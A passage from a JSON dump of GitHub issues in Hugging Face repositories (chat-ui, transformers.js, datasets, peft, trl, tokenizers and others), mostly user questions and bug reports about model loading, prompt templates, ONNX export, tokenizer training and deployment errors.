https://github.com/huggingface/chat-ui/blob/main/src/lib/server/models.ts#L198\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1221", "state": "closed", "labels": [ "support" ], "created_at": "2024-05-30T00:35:58Z", "updated_at": "2024-05-31T00:19:49Z", "comments": 4, "user": "leemgs" }, { "repo": "huggingface/transformers.js", "number": 785, "title": "Using AutoModel, AutoTokenizer with distilbert models", "body": "### Question\n\nDoes transformers.js have a function to get the label after getting the logits? How to get the labels from the inference output?\r\n\r\nlet tokenizer = await AutoTokenizer.from_pretrained('distilbert-base-uncased-finetuned-sst-2-english');\r\nlet model = await AutoModel.from_pretrained('distilbert-base-uncased-finetuned-sst-2-english');\r\n\r\nlet inputs = await tokenizer('I love transformers!');\r\nlet { logits } = await model(inputs);", "url": "https://github.com/huggingface/transformers.js/issues/785", "state": "open", "labels": [ "question" ], "created_at": "2024-05-29T20:35:17Z", "updated_at": "2024-05-30T11:09:17Z", "user": "mram0509" }, { "repo": "huggingface/chat-ui", "number": 1220, "title": "A few questions about the Cloudflare integration", "body": "Howdy \ud83d\udc4b ,\r\n\r\nWorking on a corresponding page for this in the [Cloudflare docs](https://developers.cloudflare.com/workers-ai/) and had a few [questions that I need answered](https://github.com/cloudflare/cloudflare-docs/pull/14488#issuecomment-2101481990) in this PR.\r\n\r\n## Questions\r\n\r\n1. If I'm reading [this line](https://github.com/huggingface/chat-ui/blob/25d6df858f15128e6ca23214ce7ad08f176a68ed/src/lib/server/endpoints/cloudflare/endpointCloudflare.ts#L18C21-L18C29) correctly, it sounds like [their example is actually incorrect](https://github.com/huggingface/chat-ui/blob/main/README.md?plain=1#L598) and might need to be updated?\r\n2. If ^^^ is correct, does that mean that we should also be specifying the [`model` parameter](https://github.com/huggingface/chat-ui/blob/25d6df858f15128e6ca23214ce7ad08f176a68ed/src/lib/server/endpoints/cloudflare/endpointCloudflare.ts#L19) w/in the endpoint configuration?\r\n3. Correct assumption that this only works with models prefixed with `@hf`, think so based on [their code](https://github.com/huggingface/chat-ui/blob/25d6df858f15128e6ca23214ce7ad08f176a68ed/src/lib/server/endpoints/cloudflare/endpointCloudflare.ts#L19).\r\n\r\nMind helping me out so I can get this live in our docs?", "url": "https://github.com/huggingface/chat-ui/issues/1220", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-05-29T19:11:14Z", "updated_at": "2024-06-20T12:53:52Z", "comments": 3, "user": "kodster28" }, { "repo": "huggingface/transformers.js", "number": 784, "title": "Shouldn't this work? #v3", "body": "### Question\n\n### Issue with Transformer.js v3 and WebGPU\r\n\r\n#### Description\r\nYesterday I installed `transformer.js` with the \"v3\" branch to test the new features with WebGPU, but I get an error.\r\n\r\n#### Error Message\r\n```\r\n@xenova_transformers.js?v=3b2ad0ed:24861 Uncaught (in promise)\r\nError: This pipeline is not yet supported in Transformers.js v3.\r\n```\r\n\r\n#### My code\r\n\r\n```javascript\r\nconst transcriber = await pipeline(\"automatic-speech-recognition\", \"Xenova/whisper-small.en\", {\r\n device: 'webgpu',\r\n dtype: 'fp32'\r\n});\r\n```\r\n\r\n#### Additional Information\r\nWith the following code, it works perfectly fine:\r\n\r\n```javascript\r\nconst extractor = await pipeline('feature-extraction', 'Xenova/all-MiniLM-L6-v2', {\r\n device: 'webgpu',\r\n dtype: 'fp32', // or 'fp16'\r\n});\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/784", "state": "open", "labels": [ "question" ], "created_at": "2024-05-29T13:36:52Z", "updated_at": "2024-05-29T14:59:49Z", "user": "kalix127" }, { "repo": "huggingface/datasets", "number": 6930, "title": "ValueError: Couldn't infer the same data file format for all splits. Got {'train': ('json', {}), 'validation': (None, {})}", "body": "### Describe the bug\n\nWhen I run the code en = load_dataset(\"allenai/c4\", \"en\", streaming=True), I encounter an error: raise ValueError(f\"Couldn't infer the same data file format for all splits. Got {split_modules}\") ValueError: Couldn't infer the same data file format for all splits. Got {'train': ('json', {}), 'validation': (None, {})}.\r\nHowever, running dataset = load_dataset('allenai/c4', streaming=True, data_files={'validation': 'en/c4-validation.00003-of-00008.json.gz'}, split='validation') works fine. What is the issue here?\n\n### Steps to reproduce the bug\n\nrun code\uff1a\r\nimport os\r\nos.environ['HF_ENDPOINT'] = 'https://hf-mirror.com'\r\nfrom datasets import load_dataset\r\n\r\nen = load_dataset(\"allenai/c4\", \"en\", streaming=True)\n\n### Expected behavior\n\nSuccessfully loaded the dataset.\n\n### Environment info\n\n- `datasets` version: 2.18.0\r\n- Platform: Linux-6.5.0-28-generic-x86_64-with-glibc2.17\r\n- Python version: 3.8.19\r\n- `huggingface_hub` version: 0.22.2\r\n- PyArrow version: 15.0.2\r\n- Pandas version: 2.0.3\r\n- `fsspec` version: 2024.2.0\r\n", "url": "https://github.com/huggingface/datasets/issues/6930", "state": "open", "labels": [], "created_at": "2024-05-29T12:40:05Z", "updated_at": "2024-07-23T06:25:24Z", "comments": 2, "user": "Polarisamoon" }, { "repo": "huggingface/datasets", "number": 6929, "title": "Avoid downloading the whole dataset when only README.me has been touched on hub.", "body": "### Feature request\r\n\r\n`datasets.load_dataset()` triggers a new download of the **whole dataset** when the README.md file has been touched on huggingface hub, even if data files / parquet files are the exact same.\r\n\r\nI think the current behaviour of the load_dataset function is triggered whenever a change of the hash of latest commit on huggingface hub, but is there a clever way to only download again the dataset **if and only if** data is modified ? \r\n\r\n### Motivation\r\n\r\nThe current behaviour is a waste of network bandwidth / disk space / research time.\r\n\r\n### Your contribution\r\n\r\nI don't have time to submit a PR, but I hope a simple solution will emerge from this issue ! ", "url": "https://github.com/huggingface/datasets/issues/6929", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-05-29T10:36:06Z", "updated_at": "2024-05-29T20:51:56Z", "comments": 2, "user": "zinc75" }, { "repo": "huggingface/candle", "number": 2226, "title": "How to load LoRA adapter along with the GGUF model?", "body": "Hello all,\r\n\r\nI have recently managed to convert the flan-t5 base model to GGUF #2215 . But I also have multiple LoRA adapters trained for different tasks. \r\n\r\n@EricLBuehler @LaurentMazare So I wish to know if there is a way to also load single/multiple LoRA adapters along with the GGUF model. I am currently running an inference using the following command:\r\n```bash\r\ncargo run --example quantized-t5 --release -- --weight-file \"flant5large_f16.gguf\" \\\r\n--config-file \"flan-t5-large/config.json\" \\\r\n--prompt \"Make this text coherent: Their flight is weak. They run quickly through the tree canopy.\"\r\n```\r\nBut I have the adapter as (adapter_model.bin and adapter_config.json), which I would like load along with this model **Without Weight Merging**.", "url": "https://github.com/huggingface/candle/issues/2226", "state": "open", "labels": [], "created_at": "2024-05-29T06:03:10Z", "updated_at": "2024-06-05T03:34:14Z", "user": "niranjanakella" }, { "repo": "huggingface/transformers.js", "number": 781, "title": "Progress callback for Moondream?", "body": "### Question\r\n\r\nWhile implementing Moondream (from the excellent example) I stumbled upon a few questions.\r\n\r\n- How can I implement a callback while Moondream is generating tokens? A normal progressCallback didn\u2019t work?\r\n\r\n```\r\nself.model.generate({\r\n\t...text_inputs,\r\n\t...vision_inputs, \r\n\tdo_sample: false,\r\n\tmax_new_tokens: 500,\r\n\r\n\tprogress_callback: (progress_data) => {\r\n\t\tconsole.log(\"progress_data: \", progress_data);\r\n\t\tif (progress_data.status !== 'progress') return;\r\n\t\tself.postMessage(progress_data);\r\n\t},\r\n})\r\n```\r\nI\u2019ve also tried the new CallbackStreamer option, but that had no effect either.\r\n\r\nFrom the [demo](https://github.com/xenova/transformers.js/issues/743) I know it should be possible. But I [couldn't find the source code](https://github.com/xenova/transformers.js/tree/v3) for it (yet). And trying to learn anything from the demo as-is was, well, difficult with all that [minifying](https://xenova-experimental-moondream-webgpu.static.hf.space/assets/worker-DHaYXnZx.js) and framework stuff.\r\n\r\n- Is this warning in the browser console anything to worry about?\r\n```\r\nThe number of image tokens was not set in the model configuration. Setting it to the number of features detected by the vision encoder (729).models.js:3420 \r\n```\r\n\r\n\r\n- What would be the effect of changing these values? E.g. what would be the expected outcome of changing decoder_model_merged from from q4 to q8?\r\n```\r\nembed_tokens: 'fp16',\r\nvision_encoder: 'q8', // or 'fp16'\r\ndecoder_model_merged: 'q4', // or 'q8'\r\n```\r\n\r\n- What's the difference between Moondream and [NanoLlava](https://huggingface.co/spaces/Xenova/experimental-nanollava-webgpu)? When should I use one over the other?", "url": "https://github.com/huggingface/transformers.js/issues/781", "state": "closed", "labels": [ "question" ], "created_at": "2024-05-28T14:07:07Z", "updated_at": "2024-06-03T18:49:10Z", "user": "flatsiedatsie" }, { "repo": "huggingface/competitions", "number": 29, "title": "How to notify awardees or contact participants\uff1f", "body": "The competition just shows the participants' id. \r\n\r\nSo, how to contact them via email to inform them of the award requirements and request additional personal information?", "url": "https://github.com/huggingface/competitions/issues/29", "state": "closed", "labels": [], "created_at": "2024-05-28T08:11:38Z", "updated_at": "2024-06-09T07:03:25Z", "user": "shangfenghuang" }, { "repo": "huggingface/datatrove", "number": 196, "title": "How to deduplicate multiple datasets?", "body": "fineweb offer a deduplication demo for one dump. If want to deduplicate more dumps, should I merge dumps before deduplication ?\r\n", "url": "https://github.com/huggingface/datatrove/issues/196", "state": "closed", "labels": [], "created_at": "2024-05-28T03:00:31Z", "updated_at": "2024-06-07T07:25:45Z", "user": "canghaiyunfan" }, { "repo": "huggingface/chat-ui", "number": 1183, "title": "Prompt template for WizardLM-2-8x22B?", "body": "What is the prompt template for `WizardLM-2-8x22B` in the `.env.local`?\r\n\r\nWhen setting it to the default one: `{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}}{{/ifAssistant}}{{/each}}` \r\n\r\nthe generated output is very odd and incoherent. \r\n\r\nWhen setting the prompt template to the one displayed in the [model card:](https://huggingface.co/bartowski/WizardLM-2-8x22B-GGUF) `{system_prompt} USER: {prompt} ASSISTANT: ` \r\n\r\nthe output gets even worse.\r\n\r\nCan anyone help?\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1183", "state": "open", "labels": [ "support", "models" ], "created_at": "2024-05-27T14:28:47Z", "updated_at": "2024-07-29T15:27:25Z", "comments": 3, "user": "Arche151" }, { "repo": "huggingface/chat-ui", "number": 1178, "title": "Improve Domain Search Results for Assistants", "body": "The domain search for assistants is a great idea, but the current implementation is not really useful if the domains are less likely to be top results like Wikipedia.\r\nThis seems happen because the web is searched first, and the domain filter is applied afterward. This method can easily result in zero parseable results (especially because PDF parsing is currently not available).\r\n\r\nProposed solution: Change the implementation so that the search process continues until at least one parseable result is found. To avoid excessive searching, an upper limit on the number of pages to be searched makes sense (e.g. at 100), but it should definitely be more than current limit of 8 pages.", "url": "https://github.com/huggingface/chat-ui/issues/1178", "state": "open", "labels": [ "question", "websearch" ], "created_at": "2024-05-27T10:33:22Z", "updated_at": "2024-05-31T11:02:11Z", "user": "lueschow" }, { "repo": "huggingface/datatrove", "number": 195, "title": "What is the difference between tasks and workers\uff1f", "body": "What is the difference between tasks and workers, what is the definition of tasks and how to determine the number of tasks?\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/datatrove/issues/195", "state": "closed", "labels": [], "created_at": "2024-05-27T06:32:25Z", "updated_at": "2024-05-27T07:08:11Z", "user": "canghaiyunfan" }, { "repo": "huggingface/transformers.js", "number": 778, "title": "Pipeline execution time with 'image-classification' pipeline", "body": "### Question\n\nWhile calling the 'image-classification' pipeline we pass the image url. So this does a fetch of the image. So will the time taken to process the image include the download time of the image? So if the network is slow this may impact the pipeline performance. Is there a way to use an image thats already been downloaded by the webpage for an image element? ", "url": "https://github.com/huggingface/transformers.js/issues/778", "state": "open", "labels": [ "question" ], "created_at": "2024-05-26T20:15:21Z", "updated_at": "2024-05-27T04:14:52Z", "user": "mram0509" }, { "repo": "huggingface/transformers", "number": 31039, "title": "What if past_key_values is in model_kwargs but is None", "body": "https://github.com/huggingface/transformers/blob/4c6c45ba138202f42582b5cea98126af87195a95/src/transformers/generation/utils.py#L1317\r\n\r\nThis line fails for me when past_key_values is in model_kwargs but is None. Line 1321 raises an error \r\nCould you advice?\r\n\r\nThank you", "url": "https://github.com/huggingface/transformers/issues/31039", "state": "closed", "labels": [], "created_at": "2024-05-26T07:58:18Z", "updated_at": "2024-06-10T06:32:23Z", "user": "estelleafl" }, { "repo": "huggingface/chat-ui", "number": 1174, "title": "Unable to deploy space with chatUI, getting error ** Failed to connect to 127.0.0.1 port 8080 after 0 ms**", "body": "Hi guys, so i am trying to deploy space with chatui template and **abacusai/Smaug-Llama-3-70B-Instruct** model but i am getting following error again and again in container logs.\r\n\r\n`\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 40 retries \r\nWarning: left.\r\n2024-05-26T07:02:16.945294Z INFO text_generation_launcher: Downloaded /data/models--abacusai--Smaug-Llama-3-70B-Instruct/snapshots/fbaa713bdcdc2a2f85bbbe5808ec7046700a36e5/model-00007-of-00030.safetensors in 0:00:29.\r\n2024-05-26T07:02:16.945393Z INFO text_generation_launcher: Download: [7/30] -- ETA: 0:10:47.285711\r\n2024-05-26T07:02:16.945714Z INFO text_generation_launcher: Download file: model-00008-of-00030.safetensors\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 39 retries \r\nWarning: left.\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 38 retries \r\nWarning: left.\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 37 retries \r\nWarning: left.\r\n2024-05-26T07:02:47.664282Z INFO text_generation_launcher: Downloaded /data/models--abacusai--Smaug-Llama-3-70B-Instruct/snapshots/fbaa713bdcdc2a2f85bbbe5808ec7046700a36e5/model-00008-of-00030.safetensors in 0:00:30.\r\n2024-05-26T07:02:47.664376Z INFO text_generation_launcher: Download: [8/30] -- ETA: 0:10:27\r\n2024-05-26T07:02:47.664710Z INFO text_generation_launcher: Download file: model-00009-of-00030.safetensors\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 36 retries \r\nWarning: left.\r\n{\"t\":{\"$date\":\"2024-05-26T09:02:57.879+02:00\"},\"s\":\"I\", \"c\":\"WTCHKPT\", \"id\":22430, \"ctx\":\"Checkpointer\",\"msg\":\"WiredTiger message\",\"attr\":{\"message\":{\"ts_sec\":1716706977,\"ts_usec\":879791,\"thread\":\"8:0x7f4c6fd8f640\",\"session_name\":\"WT_SESSION.checkpoint\",\"category\":\"WT_VERB_CHECKPOINT_PROGRESS\",\"category_id\":6,\"verbose_level\":\"DEBUG_1\",\"verbose_level_id\":1,\"msg\":\"saving checkpoint snapshot min: 37, snapshot max: 37 snapshot count: 0, oldest timestamp: (0, 0) , meta checkpoint timestamp: (0, 0) base write gen: 1\"}}}\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Connection refused\r\nWarning: Problem : connection refused. Will retry in 10 seconds. 35 retries \r\nWarning: left.\r\n`\r\n\r\nplease help me out thanks\r\n\r\nand yes i've added ` HF_TOEKN ` secret too", "url": "https://github.com/huggingface/chat-ui/issues/1174", "state": "open", "labels": [ "support", "docker" ], "created_at": "2024-05-26T07:05:12Z", "updated_at": "2025-06-27T10:30:24Z", "comments": 5, "user": "starlord263" }, { "repo": "huggingface/optimum", "number": 1876, "title": "Unable to generate question-answering model for Llama and there is also no list of what are the supported models for question-answering", "body": "### Feature request\n\nHi, I received this error:\r\n\r\nValueError: Asked to export a llama model for the task question-answering, but the Optimum ONNX exporter only supports the tasks feature-extraction, feature-extraction-with-past, text-generation, text-generation-with-past, text-classification for llama. Please use a supported task. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the task question-answering to be supported in the ONNX export for llama.\r\n\r\nI was trying to generate an ONNX model for QuanAI/llama-2-7b-question-answering.\r\n\r\nI also tried to search for the supported question-answering models on https://huggingface.co/docs/optimum/exporters/onnx/usage_guides/export_a_model which had a broken link pointing to https://huggingface.co/exporters/task_manager (returns a 404). I am happy to consider other question-answering models instead of Llama if there is a list of what is available.\n\n### Motivation\n\nUnable to export Llama question-answering model\n\n### Your contribution\n\nNot sure how to contribute, I am a new user", "url": "https://github.com/huggingface/optimum/issues/1876", "state": "open", "labels": [ "bug", "onnx" ], "created_at": "2024-05-26T06:10:47Z", "updated_at": "2024-10-09T07:57:24Z", "user": "customautosys" }, { "repo": "huggingface/transformers.js", "number": 776, "title": "How to point to a specific model path in order to use compressed models? (brotli)", "body": "### Question\n\nHi, \r\n\r\nI just can't find the configuration to point to a specific model file path to use .onnx.br instead of .onnx for example. \r\n\r\nI can run the model (distilbert-base-cased-distilled-squad) offline without any issue and it works. But I want to deploy it compressed using brotli. All I can see in the config files is references to the folder of the model but not the actual file paths. \r\n\r\nE.g \"model_quantized.onnx\"\r\n\r\nAny help is appreciated.", "url": "https://github.com/huggingface/transformers.js/issues/776", "state": "open", "labels": [ "question" ], "created_at": "2024-05-24T18:31:12Z", "updated_at": "2024-05-25T10:24:25Z", "user": "KamilCSPS" }, { "repo": "huggingface/chat-ui", "number": 1169, "title": "Help debugging \"Sorry, something went wrong. Please try again.\"", "body": "I am a developer working on extending this project. Sometimes I get this error \"Sorry, something went wrong. Please try again.\" I can't figure out how to debug it when it happens. What I want is for it to display the full error somehow, like with a console.log. Is there some way to do that? Or is the error saved in the mongodb? This will help me a lot with debugging.", "url": "https://github.com/huggingface/chat-ui/issues/1169", "state": "closed", "labels": [], "created_at": "2024-05-24T18:30:08Z", "updated_at": "2024-06-17T12:47:03Z", "comments": 1, "user": "loganlebanoff" }, { "repo": "huggingface/datasets", "number": 6916, "title": "```push_to_hub()``` - Prevent Automatic Generation of Splits ", "body": "### Describe the bug\n\nI currently have a dataset which has not been splited. When pushing the dataset to my hugging face dataset repository, it is split into a testing and training set. How can I prevent the split from happening?\n\n### Steps to reproduce the bug\n\n1. Have a unsplit dataset \r\n\r\n```python\r\nDataset({ features: ['input', 'output', 'Attack', '__index_level_0__'], num_rows: 944685 })\r\n```\r\n\r\n2. Push it to huggingface\r\n\r\n```python\r\ndataset.push_to_hub(dataset_name)\r\n```\r\n\r\n3. On the hugging face dataset repo, the dataset then appears to be splited:\r\n\r\n![image](https://github.com/huggingface/datasets/assets/29337128/b4fbc141-42b0-4f49-98df-dd479648fe09)\r\n\r\n4. Indeed, when loading the dataset from this repo, the dataset is split in two testing and training set.\r\n\r\n```python\r\nfrom datasets import load_dataset, Dataset\r\n\r\ndataset = load_dataset(\"Jetlime/NF-CSE-CIC-IDS2018-v2\", streaming=True)\r\ndataset\r\n```\r\noutput: \r\n\r\n```\r\nIterableDatasetDict({\r\n train: IterableDataset({\r\n features: ['input', 'output', 'Attack', '__index_level_0__'],\r\n n_shards: 2\r\n })\r\n test: IterableDataset({\r\n features: ['input', 'output', 'Attack', '__index_level_0__'],\r\n n_shards: 1\r\n })\r\n```\n\n### Expected behavior\n\nThe dataset shall not be splited, as not requested.\n\n### Environment info\n\n- `datasets` version: 2.19.1\r\n- Platform: Linux-6.2.0-35-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.23.0\r\n- PyArrow version: 15.0.2\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.3.1", "url": "https://github.com/huggingface/datasets/issues/6916", "state": "closed", "labels": [], "created_at": "2024-05-22T23:52:15Z", "updated_at": "2024-05-23T00:07:53Z", "comments": 0, "user": "jetlime" }, { "repo": "huggingface/peft", "number": 1750, "title": "How to finetune embeddings and LM head as a single layer when they are tied?", "body": "I am looking to LoRA-finetune models like Gemma, which have tied embeddings.\r\nBut, I would also like to have the shared embeddings as trainable (the common embedding table corresponding to both input and output embeddings of the network).\r\n\r\nHow do I achieve this?\r\n\r\n---\r\n\r\n_Note:_ Passing both `[\"embed_tokens\",\"lm_head\"]` to `modules_to_save` will result in untying them, because PEFT will create separate tensor copies. Passing only `[\"embed_tokens\"]` will result in only the input embeddings trainable (by making a separate PEFT copy), while the output embeddings being as it is (the original tensor).", "url": "https://github.com/huggingface/peft/issues/1750", "state": "closed", "labels": [], "created_at": "2024-05-21T18:32:07Z", "updated_at": "2025-08-12T11:54:09Z", "user": "GokulNC" }, { "repo": "huggingface/blog", "number": 2078, "title": "Idefics2's perceiver how to make attentionamsk to None?", "body": "I set atttentionmask to None, but the model doesn't learned well, my inputs didn't padded so I dont want attention mask. How to resolve this?\r\n\r\nI also tried add a all ones attnetionmask, but the result also very worse.", "url": "https://github.com/huggingface/blog/issues/2078", "state": "open", "labels": [], "created_at": "2024-05-21T07:38:57Z", "updated_at": "2024-05-21T07:38:57Z", "user": "lucasjinreal" }, { "repo": "huggingface/peft", "number": 1749, "title": "how to fine tune LoRA HQQ?", "body": "### Feature request\n\nhow to fine tune LoRA to HQQ?\n\n### Motivation\n\nhow to fine tune LoRA to HQQ?\n\n### Your contribution\n\nhow to fine tune LoRA to HQQ?", "url": "https://github.com/huggingface/peft/issues/1749", "state": "closed", "labels": [], "created_at": "2024-05-21T02:56:18Z", "updated_at": "2024-06-29T15:03:18Z", "user": "NickyDark1" }, { "repo": "huggingface/trl", "number": 1650, "title": "how to save v_head", "body": "currently, I use `ppo_trainer.save_pretrained` to save a model that is still in training, because the machine I used is rather unstable, and I would often need to resume retraining should it be interrupted. When I resume the training I got the following warning:\r\n```\r\nWARNING:root:A model is loaded from 'RLGAF_gemma-7b-lima_sft_preprocessing_20epochs', and no v_head weight is found. This IS expected if you are not resuming PPO training.\r\n```\r\nI guess this is relevant to my case, since I need to resume PPO training. What is the proper way then to save the checkpoint of PPO training with the goal of resuming it later?", "url": "https://github.com/huggingface/trl/issues/1650", "state": "closed", "labels": [], "created_at": "2024-05-20T17:06:00Z", "updated_at": "2025-04-11T10:14:36Z", "user": "zyzhang1130" }, { "repo": "huggingface/chat-ui", "number": 1153, "title": "Can we use Hugging Face Chat with a Custom Server ", "body": "Requirement: \r\nI have a custom API which takes in the inputs queries and passes it through a RAG pipeline and finally to llm and returns the result. \r\n\r\nQuestion is, can I integrate it with Chat-UI (utilizing just chat-ui frontend and my custom backend). If yes, is there any documentation around it. As per what I understood till now, it looks like it is possible, but I have to make a lot of changes in the UI code itself to accommodate this. What I can see is that the UI is tightly coupled with the text generation from models and doesn't fully support calling an API directly without making code changes. \r\n\r\nAre there any docs for this?\r\n\r\nAlso, can we use any other db other than mongodb?", "url": "https://github.com/huggingface/chat-ui/issues/1153", "state": "closed", "labels": [], "created_at": "2024-05-20T16:44:01Z", "updated_at": "2024-09-03T07:52:18Z", "comments": 9, "user": "snps-ravinu" }, { "repo": "huggingface/nanotron", "number": 176, "title": "Where is the \"nanotron format\" defined?", "body": "I see that any(?) hf model can be converted to nanotron format with this [script](https://github.com/huggingface/nanotron/blob/main/examples/llama/convert_hf_to_nanotron.py).\r\n\r\nIs there documentation describing this format?\r\n\r\nCan any model that may be loaded with AutoModelForCausalLM be converted to nanotron format for training?\r\n\r\n", "url": "https://github.com/huggingface/nanotron/issues/176", "state": "closed", "labels": [], "created_at": "2024-05-20T13:54:52Z", "updated_at": "2024-05-21T17:22:50Z", "user": "RonanKMcGovern" }, { "repo": "huggingface/chat-ui", "number": 1151, "title": "Can I change localhost to remote IP?", "body": "I am running Chat-UI in local, but I want to change localhost to IP, I am unable to find this configguration in the code. Can anyone help?", "url": "https://github.com/huggingface/chat-ui/issues/1151", "state": "closed", "labels": [], "created_at": "2024-05-20T05:34:23Z", "updated_at": "2024-05-20T07:01:30Z", "comments": 1, "user": "snps-ravinu" }, { "repo": "huggingface/candle", "number": 2197, "title": "How to slice a tensor?", "body": "tch has the function `slice` that return a tensor slice. Is there a corresponding function for candle?", "url": "https://github.com/huggingface/candle/issues/2197", "state": "closed", "labels": [], "created_at": "2024-05-20T00:55:08Z", "updated_at": "2024-05-20T01:46:58Z", "user": "Gadersd" }, { "repo": "huggingface/tokenizers", "number": 1534, "title": "How to allow the merging of consecutive newline tokens \\n when training a byte-level bpe tokenizer?", "body": "Hello, I'm currently working on training a byte-level BPE tokenizer using the Huggingface tokenizers library. I've created a simple training script, a sample corpus, and provided the output produced by this script. My aim is to understand why consecutive newline tokens `\\n` are not being merged into a single token `\\n\\n` during the tokenization process. Below are the details:\r\n\r\n```python\r\nfrom tokenizers import (\r\n Tokenizer,\r\n pre_tokenizers,\r\n models,\r\n decoders,\r\n trainers,\r\n processors,\r\n)\r\n\r\nfiles = [\"demo_corpus.txt\"]\r\ntokenizer = Tokenizer(models.BPE())\r\ntokenizer.pre_tokenizer = pre_tokenizers.Sequence([\r\n pre_tokenizers.Digits(individual_digits=True),\r\n pre_tokenizers.ByteLevel(add_prefix_space=False, use_regex=True)\r\n])\r\ntokenizer.decoder = decoders.ByteLevel()\r\ntokenizer.post_processor = processors.ByteLevel()\r\n\r\ntrainer = trainers.BpeTrainer(\r\n initial_alphabet=pre_tokenizers.ByteLevel.alphabet(),\r\n vocab_size=2000,\r\n special_tokens=[\r\n \"\", \"<|beginoftext|>\", \"<|endoftext|>\"\r\n ]\r\n)\r\ntokenizer.train(files, trainer)\r\ntest_text = \"#include \\n\\n\\n\\n\\n\"\r\n\r\nprint(\"pre-tokenize spans:\", tokenizer.pre_tokenizer.pre_tokenize_str(test_text))\r\nids = tokenizer.encode(test_text).ids\r\nprint(f\"tokens: {[tokenizer.decode([tid]) for tid in ids]}\")\r\n```\r\n\r\ndemo_corpus.txt:\r\n```\r\n#include \r\n\r\n#include \r\n\r\n#include \r\n\r\nusing namespace std;\r\n\r\nint main(){\r\n int N, A[100000], p = 0;\r\n\r\n multiset S;\r\n\r\n scanf(\"%d\", &N);\r\n\r\n int p0 = 0, q0 = 1, q = N-1;\r\n\r\n vector result;\r\n\r\n for(int i: result)\r\n\r\n printf(\"%d\\n\", i);\r\n}\r\n```\r\n\r\noutput of training script:\r\n```\r\npre-tokenize spans: [('#', (0, 1)), ('include', (1, 8)), ('\u0120<', (8, 10)), ('set', (10, 13)), ('>', (13, 14)), ('\u010a\u010a\u010a\u010a\u010a', (14, 19))]\r\ntokens: ['#', 'include', ' <', 'set', '>', '\\n', '\\n', '\\n', '\\n', '\\n']\r\n```\r\n\r\nthe following is tokens produced by llama3 tokenizer:\r\n```python\r\ntokenizer = LlamaTokenizerFast.from_pretrained(\"my llama3 vocab path\")\r\ntest_text = \"#include \\n\\n\\n\\n\\n\"\r\nprint([tokenizer.decode([tid]) for tid in tokenizer(test_text)[\"input_ids\"]])\r\n\r\n# output\r\n# ['<|begin_of_text|>', '#include', ' <', 'set', '>\\n\\n\\n\\n\\n']\r\n```\r\n", "url": "https://github.com/huggingface/tokenizers/issues/1534", "state": "open", "labels": [ "bug" ], "created_at": "2024-05-18T03:11:35Z", "updated_at": "2025-07-07T09:34:16Z", "user": "liuslnlp" }, { "repo": "huggingface/transformers", "number": 30886, "title": "How to get the data seen by the model during training?", "body": "Hi! I haven't been able to find an answer to my question so opening an issue here. I'm fine-tuning the GPT-2 XL model using the trainer for 10 epochs and I'd like to save the data seen by the model during each epoch. More specifically, I want to save the data seen by the model every 242 steps. For instance, data seen from step 1 to step 242, step 243 to step 484, and so on until the end of the 10th epoch. I'm a bit confused about how to do this since the data is shuffled after each epoch. Is it possible to use `TrainerCallback` here?\r\n\r\nThese are my training args\r\n` training_args = TrainingArguments(\r\n f\"models/XL\",\r\n evaluation_strategy = \"steps\",\r\n learning_rate=2e-5,\r\n weight_decay=0.01,\r\n push_to_hub=False,\r\n num_train_epochs=10,\r\n per_device_train_batch_size=8, \r\n per_device_eval_batch_size=8, \r\n save_strategy=\"epoch\", \r\n save_steps = 242, \r\n fp16=True, \r\n report_to=\"none\", \r\n logging_strategy=\"steps\",\r\n logging_steps=100, \r\n )`\r\n \r\n I'd appreciate any directions. Thanks :) ", "url": "https://github.com/huggingface/transformers/issues/30886", "state": "closed", "labels": [], "created_at": "2024-05-17T21:32:50Z", "updated_at": "2024-05-20T17:26:29Z", "user": "jaydeepborkar" }, { "repo": "huggingface/optimum", "number": 1859, "title": "Improve inference time TrOCR", "body": "I have a fine tuning TrOCR model, and i'm using \r\n`from optimum.onnxruntime import ORTModelForVision2Seq`\r\nhow i can then make the inferation faster, when some one make a request in a endpoint api ? , i already using async for multi request", "url": "https://github.com/huggingface/optimum/issues/1859", "state": "closed", "labels": [ "question", "inference", "Stale" ], "created_at": "2024-05-16T13:31:53Z", "updated_at": "2024-12-18T02:06:21Z", "user": "CrasCris" }, { "repo": "huggingface/chat-ui", "number": 1148, "title": "Chat-ui Audit Logs", "body": "Hello,\r\n\r\nIs there a way to log the username, sessionID, conversation ID, what 